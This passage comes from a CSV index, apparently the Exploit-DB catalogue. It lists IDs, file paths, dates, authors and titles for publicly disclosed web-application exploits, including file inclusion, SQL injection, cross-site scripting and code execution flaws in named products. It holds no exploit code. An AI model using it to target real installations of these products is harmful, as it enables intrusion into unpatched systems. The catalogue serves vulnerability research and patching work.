Traversal",2007-04-25,anonymous,php,webapps, -29899,exploits/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",php,webapps, -29902,exploits/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps, -29903,exploits/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusions",2007-04-25,CodeXpLoder'tq,php,webapps, -29904,exploits/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps, -29905,exploits/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps, -29906,exploits/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps, -29907,exploits/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps, -29908,exploits/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusions",2007-04-25,s3rv3r_hack3r,php,webapps, -29909,exploits/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,php,webapps, -29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps, -29911,exploits/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps, -29912,exploits/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps, -29913,exploits/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",php,webapps, -29914,exploits/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps, -29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps, -29917,exploits/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps, -29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,java,webapps, -29921,exploits/php/webapps/29921.py,"Zend-Framework - Full Information Disclosure",2013-11-30,"Ariel Orellana",php,webapps, -29924,exploits/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps, -29927,exploits/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,hardware,webapps, -29929,exploits/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - 'BRY.asp' SQL Injection",2007-04-26,RMx,asp,webapps, -29933,exploits/asp/webapps/29933.txt,"Gazi Download Portal - 'Down_Indir.asp' SQL Injection",2007-04-30,ertuqrul,asp,webapps, -29935,exploits/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps, -29938,exploits/php/webapps/29938.txt,"E-Annu - 'home.php' SQL Injection",2007-04-30,ilkerkandemir,php,webapps, -29941,exploits/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps, -29944,exploits/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps, -29946,exploits/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps, -30197,exploits/php/webapps/30197.txt,"WSPortal 1.0 - 'content.php' SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps, -30198,exploits/asp/webapps/30198.txt,"TDizin - 'Arama.asp' Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps, -30199,exploits/cgi/webapps/30199.txt,"WebIf - 'OutConfig' Local File Inclusion",2007-06-18,maiosyet,cgi,webapps, -30059,exploits/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps, -29953,exploits/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps, -29955,exploits/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps, -29956,exploits/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,php,webapps, -29957,exploits/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,php,webapps, -29958,exploits/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps, -29959,exploits/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps, -29960,exploits/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple SQL Injections",2007-05-07,"John Martinelli",php,webapps, -29961,exploits/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php?l' Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps, -29962,exploits/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps, -29963,exploits/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps, -29965,exploits/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - 'picture.php' Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps, -29966,exploits/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29967,exploits/php/webapps/29967.txt,"Campsite 2.6.1 - 'article.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29968,exploits/php/webapps/29968.txt,"Campsite 2.6.1 - 'ArticleAttachment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29969,exploits/php/webapps/29969.txt,"Campsite 2.6.1 - 'ArticleComment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29970,exploits/php/webapps/29970.txt,"Campsite 2.6.1 - 'ArticleData.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29971,exploits/php/webapps/29971.txt,"Campsite 2.6.1 - 'ArticleImage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29972,exploits/php/webapps/29972.txt,"Campsite 2.6.1 - 'ArticleIndex.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29973,exploits/php/webapps/29973.txt,"Campsite 2.6.1 - 'ArticlePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29974,exploits/php/webapps/29974.txt,"Campsite 2.6.1 - 'ArticleTopic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29975,exploits/php/webapps/29975.txt,"Campsite 2.6.1 - 'ArticleType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29976,exploits/php/webapps/29976.txt,"Campsite 2.6.1 - 'ArticleTypeField.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29977,exploits/php/webapps/29977.txt,"Campsite 2.6.1 - 'Country.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29978,exploits/php/webapps/29978.txt,"Campsite 2.6.1 - 'DatabaseObject.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29979,exploits/php/webapps/29979.txt,"Campsite 2.6.1 - 'Event.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29980,exploits/php/webapps/29980.txt,"Campsite 2.6.1 - 'IPAccess.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29981,exploits/php/webapps/29981.txt,"Campsite 2.6.1 - 'image.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29982,exploits/php/webapps/29982.txt,"Campsite 2.6.1 - 'issue.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29983,exploits/php/webapps/29983.txt,"Campsite 2.6.1 - 'IssuePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29984,exploits/php/webapps/29984.txt,"Campsite 2.6.1 - 'Language.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29985,exploits/php/webapps/29985.txt,"Campsite 2.6.1 - 'Log.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29986,exploits/php/webapps/29986.txt,"Campsite 2.6.1 - 'LoginAttempts.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29987,exploits/php/webapps/29987.txt,"Campsite 2.6.1 - 'Publication.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29988,exploits/php/webapps/29988.txt,"Campsite 2.6.1 - 'Section.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29989,exploits/php/webapps/29989.txt,"Campsite 2.6.1 - 'ShortURL.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29990,exploits/php/webapps/29990.txt,"Campsite 2.6.1 - 'Subscription.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29991,exploits/php/webapps/29991.txt,"Campsite 2.6.1 - 'SubscriptionDefaultTime.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29996,exploits/php/webapps/29996.txt,"Campsite 2.6.1 - 'topic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29997,exploits/php/webapps/29997.txt,"Campsite 2.6.1 - 'UrlType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29998,exploits/php/webapps/29998.txt,"Campsite 2.6.1 - 'user.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29999,exploits/php/webapps/29999.txt,"Campsite 2.6.1 - 'UserType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -30000,exploits/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps, -30002,exploits/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps, -30003,exploits/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -30004,exploits/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -30005,exploits/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -30006,exploits/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -30012,exploits/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php?password' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,exploits/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php?language' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30062,exploits/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps, -30063,exploits/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps, -30064,exploits/php/webapps/30064.txt,"HLstats 1.35 - 'hlstats.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps, -30065,exploits/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps, -30066,exploits/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",php,webapps, -30068,exploits/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps, -30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps, -30071,exploits/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - 'Parser_Path' Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps, -30073,exploits/php/webapps/30073.txt,"GMTT Music Distro 1.2 - 'ShowOwn.php' Cross-Site Scripting",2007-05-22,CorryL,php,webapps, -30075,exploits/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps, -30076,exploits/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps, -30077,exploits/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps, -30079,exploits/php/webapps/30079.txt,"2z Project 0.9.5 - 'rating.php' Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps, -30081,exploits/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - 'news.asp' Cross-Site Scripting",2007-05-24,vagrant,php,webapps, -30082,exploits/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,php,webapps, -30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps, -30084,exploits/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps, -30086,exploits/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps, -30087,exploits/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps, -30088,exploits/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps, -30095,exploits/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps, -30097,exploits/php/webapps/30097.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps, -30098,exploits/php/webapps/30098.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",php,webapps, -30099,exploits/php/webapps/30099.txt,"DGNews 2.1 - 'NewsID' SQL Injection",2007-05-28,"laurent gaffie",php,webapps, -30101,exploits/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps, -30102,exploits/php/webapps/30102.php,"Pheap 2.0 - 'config.php' Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps, -30103,exploits/php/webapps/30103.txt,"Particle Blogger 1.2.1 - 'Archives.php' SQL Injection",2007-03-16,Serapis.net,php,webapps, -30213,exploits/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,php,webapps, -30215,exploits/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps, -30283,exploits/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps, -30216,exploits/cfm/webapps/30216.txt,"FuseTalk 4.0 - 'AuthError.cfm' Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps, -30217,exploits/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps, -30220,exploits/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps, -30221,exploits/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injections",2007-06-21,r0t,php,webapps, -30223,exploits/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps, -30225,exploits/php/webapps/30225.txt,"eNdonesia 8.4 - 'mod.php?viewarticle Action artid' SQL Injection",2007-06-22,"laurent gaffie",php,webapps, -30226,exploits/php/webapps/30226.txt,"eNdonesia 8.4 - 'banners.php?click Action bid' SQL Injection",2007-06-22,"laurent gaffie",php,webapps, -30227,exploits/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion",2007-06-22,spymeta,php,webapps, -30230,exploits/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps, -30232,exploits/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps, -30234,exploits/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injections",2007-06-25,"Jesper Jurcenoks",php,webapps, -30235,exploits/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,php,webapps, -30238,exploits/php/webapps/30238.txt,"Cythosia 2.x Botnet (C2 Web Panel) - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps, -30366,exploits/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps, -30246,exploits/php/webapps/30246.txt,"WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps, -30248,exploits/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps, -30249,exploits/php/webapps/30249.txt,"Papoo 1.0.3 - 'Plugin.php' Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps, -30250,exploits/asp/webapps/30250.txt,"DUClassmate 1.x - 'ICity' SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps, -30253,exploits/php/webapps/30253.txt,"ETicket 1.5.5 - 'Open.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps, -30259,exploits/php/webapps/30259.txt,"Claroline 1.8.3 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps, -30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",cgi,webapps, -30261,exploits/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,php,webapps, -30262,exploits/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps, -30263,exploits/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps, -30266,exploits/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp?alpha' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps, -30267,exploits/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp?task' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps, -30268,exploits/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - 'netflow/jspui/index.jsp?view' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps, -30269,exploits/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps, -30270,exploits/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps, -30271,exploits/java/webapps/30271.txt,"OpManager 6/7 - 'ping.do?name' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps, -30272,exploits/java/webapps/30272.txt,"OpManager 6/7 - 'traceRoute.do?name' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps, -30273,exploits/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps, -30274,exploits/java/webapps/30274.txt,"OpManager 6/7 - 'admin/ServiceConfiguration.do?Operation' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps, -30275,exploits/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps, -30277,exploits/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps, -30282,exploits/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - 'Oku.asp' SQL Injection",2007-07-07,GeFORC3,asp,webapps, -30286,exploits/linux/webapps/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,webapps, -30289,exploits/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps, -30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps, -30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps, -30294,exploits/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,php,webapps, -30296,exploits/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps, -30297,exploits/asp/webapps/30297.txt,"contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps, -30298,exploits/asp/webapps/30298.txt,"contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps, -30299,exploits/php/webapps/30299.txt,"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps, -30300,exploits/asp/webapps/30300.txt,"MzK Blog - 'Katgoster.asp' SQL Injection",2007-03-23,GeFORC3,asp,webapps, -30301,exploits/php/webapps/30301.txt,"Dating Gold 3.0.5 - 'header.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps, -30302,exploits/php/webapps/30302.txt,"Dating Gold 3.0.5 - 'footer.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps, -30303,exploits/php/webapps/30303.txt,"Dating Gold 3.0.5 - 'secure.admin.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps, -30383,exploits/php/webapps/30383.txt,"Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps, -30384,exploits/php/webapps/30384.txt,"Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps, -30385,exploits/php/webapps/30385.txt,"Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps, -30386,exploits/php/webapps/30386.txt,"Vikingboard 0.1.2 - 'topic.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps, -30387,exploits/php/webapps/30387.txt,"Vikingboard 0.1.2 - 'forum.php' Information Disclosure",2007-07-25,Lostmon,php,webapps, -30388,exploits/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps, -30389,exploits/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps, -30390,exploits/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' SQL Injection",2007-07-26,"Aria-Security Team",php,webapps, -30391,exploits/php/webapps/30391.txt,"PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion",2007-07-26,S4M3K,php,webapps, -30801,exploits/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps, -30310,exploits/php/webapps/30310.txt,"Piwigo CMS 2.5.3 - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps, -30311,exploits/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps, -30312,exploits/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps, -30313,exploits/asp/webapps/30313.txt,"TBDev.NET DR - 'TakeProfEdit.php' HTML Injection",2007-07-16,PescaoDeth,asp,webapps, -30316,exploits/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - 'Philboard_forum.asp' SQL Injection",2007-07-17,GeFORC3,asp,webapps, -30317,exploits/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps, -30318,exploits/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps, -30320,exploits/php/webapps/30320.txt,"GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps, -30321,exploits/php/webapps/30321.txt,"GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps, -30323,exploits/php/webapps/30323.txt,"UseBB 1.0.7 - '/install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps, -30324,exploits/php/webapps/30324.txt,"UseBB 1.0.7 - '/install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps, -30978,exploits/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps, -30327,exploits/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps, -30328,exploits/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - 'index.asp' SQL Injection",2007-07-23,GeFORC3,asp,webapps, -30329,exploits/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,php,webapps, -30330,exploits/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - 'index.asp' Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps, -30331,exploits/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps, -30332,exploits/asp/webapps/30332.txt,"Image Racer - 'searchresults.asp' SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps, -30333,exploits/php/webapps/30333.txt,"PHMe 0.0.2 - 'Function_List.php' Local File Inclusion",2007-07-23,You_You,php,webapps, -30382,exploits/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps, -30378,exploits/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps, -30379,exploits/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps, -30380,exploits/php/webapps/30380.txt,"cPanel 10.9.1 - 'Resname' Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps, -30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps, -30793,exploits/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps, -30794,exploits/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps, -30375,exploits/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web 